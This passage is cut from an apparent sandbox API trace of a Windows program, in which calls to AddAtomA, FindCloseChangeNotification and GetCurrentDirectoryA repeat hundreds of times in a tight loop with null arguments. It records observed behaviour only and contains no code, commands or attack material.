0x26 [0082.039] AddAtomA (lpString=0x0) returned 0x0 [0082.039] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.039] AddAtomA (lpString=0x0) returned 0x0 [0082.039] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.039] AddAtomA (lpString=0x0) returned 0x0 [0082.039] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.039] AddAtomA (lpString=0x0) returned 0x0 [0082.039] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.039] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.039] AddAtomA (lpString=0x0) returned 0x0 [0082.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.040] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.040] AddAtomA (lpString=0x0) returned 0x0 [0082.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.040] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.040] AddAtomA (lpString=0x0) returned 0x0 [0082.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.040] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.040] AddAtomA (lpString=0x0) returned 0x0 [0082.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.040] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.040] AddAtomA (lpString=0x0) returned 0x0 [0082.040] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.041] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.041] AddAtomA (lpString=0x0) returned 0x0 [0082.041] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.041] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.041] AddAtomA (lpString=0x0) returned 0x0 [0082.041] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.041] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.041] AddAtomA (lpString=0x0) returned 0x0 [0082.041] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.041] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.041] AddAtomA (lpString=0x0) returned 0x0 [0082.041] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.041] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.042] AddAtomA (lpString=0x0) returned 0x0 [0082.042] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.042] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.042] AddAtomA (lpString=0x0) returned 0x0 [0082.042] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.042] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.042] AddAtomA (lpString=0x0) returned 0x0 [0082.042] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.042] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.042] AddAtomA (lpString=0x0) returned 0x0 [0082.042] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.042] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.042] AddAtomA (lpString=0x0) returned 0x0 [0082.043] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.043] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.043] AddAtomA (lpString=0x0) returned 0x0 [0082.043] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.043] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.043] AddAtomA (lpString=0x0) returned 0x0 [0082.043] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.043] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.043] AddAtomA (lpString=0x0) returned 0x0 [0082.043] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.043] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.044] AddAtomA (lpString=0x0) returned 0x0 [0082.044] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.044] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.044] AddAtomA (lpString=0x0) returned 0x0 [0082.044] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.044] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.044] AddAtomA (lpString=0x0) returned 0x0 [0082.044] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.044] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.044] AddAtomA (lpString=0x0) returned 0x0 [0082.044] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.045] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.045] AddAtomA (lpString=0x0) returned 0x0 [0082.045] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.045] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.045] AddAtomA (lpString=0x0) returned 0x0 [0082.045] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.045] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.045] AddAtomA (lpString=0x0) returned 0x0 [0082.045] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.045] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.046] AddAtomA (lpString=0x0) returned 0x0 [0082.046] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.046] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.046] AddAtomA (lpString=0x0) returned 0x0 [0082.046] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.046] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.046] AddAtomA (lpString=0x0) returned 0x0 [0082.046] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.046] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.046] AddAtomA (lpString=0x0) returned 0x0 [0082.046] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.046] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.046] AddAtomA (lpString=0x0) returned 0x0 [0082.046] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.046] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.047] AddAtomA (lpString=0x0) returned 0x0 [0082.047] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.047] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.047] AddAtomA (lpString=0x0) returned 0x0 [0082.047] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.047] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.047] AddAtomA (lpString=0x0) returned 0x0 [0082.047] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.047] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.047] AddAtomA (lpString=0x0) returned 0x0 [0082.047] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.047] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.047] AddAtomA (lpString=0x0) returned 0x0 [0082.047] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.048] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.048] AddAtomA (lpString=0x0) returned 0x0 [0082.048] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.048] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.048] AddAtomA (lpString=0x0) returned 0x0 [0082.048] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.048] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.048] AddAtomA (lpString=0x0) returned 0x0 [0082.048] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.048] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.049] AddAtomA (lpString=0x0) returned 0x0 [0082.049] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.049] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.049] AddAtomA (lpString=0x0) returned 0x0 [0082.049] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.049] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.049] AddAtomA (lpString=0x0) returned 0x0 [0082.049] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.049] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.049] AddAtomA (lpString=0x0) returned 0x0 [0082.049] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.049] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.050] AddAtomA (lpString=0x0) returned 0x0 [0082.050] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.050] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.050] AddAtomA (lpString=0x0) returned 0x0 [0082.050] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.050] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.050] AddAtomA (lpString=0x0) returned 0x0 [0082.050] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.050] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.050] AddAtomA (lpString=0x0) returned 0x0 [0082.050] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.050] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.051] AddAtomA (lpString=0x0) returned 0x0 [0082.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.051] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.051] AddAtomA (lpString=0x0) returned 0x0 [0082.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.051] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.051] AddAtomA (lpString=0x0) returned 0x0 [0082.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.051] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.051] AddAtomA (lpString=0x0) returned 0x0 [0082.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.052] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.052] AddAtomA (lpString=0x0) returned 0x0 [0082.052] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.052] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.052] AddAtomA (lpString=0x0) returned 0x0 [0082.052] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.052] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.052] AddAtomA (lpString=0x0) returned 0x0 [0082.052] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.052] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.053] AddAtomA (lpString=0x0) returned 0x0 [0082.053] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.053] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.053] AddAtomA (lpString=0x0) returned 0x0 [0082.053] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.053] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.053] AddAtomA (lpString=0x0) returned 0x0 [0082.053] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.053] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.053] AddAtomA (lpString=0x0) returned 0x0 [0082.053] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.054] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.054] AddAtomA (lpString=0x0) returned 0x0 [0082.054] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.054] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.054] AddAtomA (lpString=0x0) returned 0x0 [0082.054] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.054] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.054] AddAtomA (lpString=0x0) returned 0x0 [0082.054] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.054] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.054] AddAtomA (lpString=0x0) returned 0x0 [0082.054] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.055] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.055] AddAtomA (lpString=0x0) returned 0x0 [0082.055] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.055] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.055] AddAtomA (lpString=0x0) returned 0x0 [0082.055] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.055] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.055] AddAtomA (lpString=0x0) returned 0x0 [0082.055] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.055] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.055] AddAtomA (lpString=0x0) returned 0x0 [0082.055] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.055] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.056] AddAtomA (lpString=0x0) returned 0x0 [0082.056] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.056] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.056] AddAtomA (lpString=0x0) returned 0x0 [0082.056] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.056] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.056] AddAtomA (lpString=0x0) returned 0x0 [0082.056] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.056] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.056] AddAtomA (lpString=0x0) returned 0x0 [0082.056] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.056] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.057] AddAtomA (lpString=0x0) returned 0x0 [0082.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.057] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.057] AddAtomA (lpString=0x0) returned 0x0 [0082.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.057] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.057] AddAtomA (lpString=0x0) returned 0x0 [0082.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.057] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.057] AddAtomA (lpString=0x0) returned 0x0 [0082.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.057] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.057] AddAtomA (lpString=0x0) returned 0x0 [0082.057] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.058] AddAtomA (lpString=0x0) returned 0x0 [0082.058] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.058] AddAtomA (lpString=0x0) returned 0x0 [0082.058] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.058] AddAtomA (lpString=0x0) returned 0x0 [0082.058] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.058] AddAtomA (lpString=0x0) returned 0x0 [0082.058] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.058] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.058] AddAtomA (lpString=0x0) returned 0x0 [0082.058] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.059] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.059] AddAtomA (lpString=0x0) returned 0x0 [0082.059] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.059] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.059] AddAtomA (lpString=0x0) returned 0x0 [0082.059] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.059] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.059] AddAtomA (lpString=0x0) returned 0x0 [0082.059] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.059] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.059] AddAtomA (lpString=0x0) returned 0x0 [0082.059] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.060] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.060] AddAtomA (lpString=0x0) returned 0x0 [0082.060] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.060] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.060] AddAtomA (lpString=0x0) returned 0x0 [0082.060] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.060] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.060] AddAtomA (lpString=0x0) returned 0x0 [0082.060] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.060] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.060] AddAtomA (lpString=0x0) returned 0x0 [0082.060] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.060] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.060] AddAtomA (lpString=0x0) returned 0x0 [0082.060] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.061] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.061] AddAtomA (lpString=0x0) returned 0x0 [0082.061] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.061] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.061] AddAtomA (lpString=0x0) returned 0x0 [0082.061] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.061] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.061] AddAtomA (lpString=0x0) returned 0x0 [0082.061] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.061] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.061] AddAtomA (lpString=0x0) returned 0x0 [0082.061] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.061] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.061] AddAtomA (lpString=0x0) returned 0x0 [0082.061] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.061] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.062] AddAtomA (lpString=0x0) returned 0x0 [0082.062] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.062] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.062] AddAtomA (lpString=0x0) returned 0x0 [0082.062] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.062] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.062] AddAtomA (lpString=0x0) returned 0x0 [0082.062] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.062] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.062] AddAtomA (lpString=0x0) returned 0x0 [0082.062] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.062] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.062] AddAtomA (lpString=0x0) returned 0x0 [0082.062] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.062] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.062] AddAtomA (lpString=0x0) returned 0x0 [0082.062] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.062] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.062] AddAtomA (lpString=0x0) returned 0x0 [0082.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.063] AddAtomA (lpString=0x0) returned 0x0 [0082.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.063] AddAtomA (lpString=0x0) returned 0x0 [0082.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.063] AddAtomA (lpString=0x0) returned 0x0 [0082.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.063] AddAtomA (lpString=0x0) returned 0x0 [0082.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.063] AddAtomA (lpString=0x0) returned 0x0 [0082.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.063] AddAtomA (lpString=0x0) returned 0x0 [0082.063] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.063] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.063] AddAtomA (lpString=0x0) returned 0x0 [0082.064] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.064] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.064] AddAtomA (lpString=0x0) returned 0x0 [0082.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.158] AddAtomA (lpString=0x0) returned 0x0 [0082.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: 